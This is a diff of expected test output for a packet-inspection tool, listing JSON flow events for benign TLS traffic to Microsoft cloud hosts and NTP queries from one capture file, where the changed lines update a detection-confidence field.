{"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1626168079361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079361,"pkt":"WNVuaKQA8BiYFWV8CABFAABM2zIAAEARlFXAqAF5Ef02+8RwAHsAOAx5IwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1626168079391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079391,"pkt":"8BiYFWV8WNVuaKQACABFAABMVlxAADcR4isR\/Tb7wKgBeQB7xHAAOKCnJAED6wAAAAAAAAAMU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mPcazl\/+SX2Y9xr5E6"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} @@ -147,15 +147,15 @@ 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1626168080092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080092,"pkt":"WNVuaKQA8BiYFWV8CABFAABMx3MAAEARqBTAqAF5Ef02+\/5LAHsAONKdIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1626168080122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080122,"pkt":"8BiYFWV8WNVuaKQACABFAABMV31AADcR4QoR\/Tb7wKgBeQB7\/ksAOLQqJAED6wAAAAAAAAANU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQLKsA6OSX2ZAsrLL1"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} @@ -163,58 +163,58 @@ 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} 